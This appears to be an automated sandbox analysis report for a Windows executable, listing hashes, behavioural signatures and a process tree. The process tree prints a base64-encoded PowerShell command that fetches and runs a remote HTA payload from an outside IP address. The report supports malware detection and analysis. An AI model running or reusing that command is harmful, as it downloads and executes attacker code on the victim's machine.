Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
05-11-2024 14:14
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240708-en
windows7-x64
4 signatures
150 seconds
General
-
Target
file.exe
-
Size
105KB
-
MD5
edd1f792f4dcfaa2e3cc2cb30ab248e8
-
SHA1
2510594e8f4ba919813be0362e9fd7f0620680da
-
SHA256
7876f0415e0a2c190ea29756895ebff0c1251abf7aaf1061731b8346564ab571
-
SHA512
036bb0b4afeebc2e24675dcbd1973b7a54c70d0a33655b86582a19bfd116a78ba09344aedce2c3718a4ecaf894cd5d496019a8247fd9b8646f0c0c4b5cb30bf5
-
SSDEEP
384:AMjfVU+V4yg3d2xMGJn6BrfKNG99Sjvb99SjvWp:d7XCVMxylB9Sbh9Sb
Score
6/10
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2708 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2028 wrote to memory of 2708 2028 file.exe 30 PID 2028 wrote to memory of 2708 2028 file.exe 30 PID 2028 wrote to memory of 2708 2028 file.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand LgAgAFwAVwAqAFwAUwAqADIAXABtACoAaAA/AGEALgAqACAAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAyAC4ANwAxAC4AMQA4ADMAOgA4ADAAOAAxAC8AMAAvADMALgBoAHQAYQAnAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-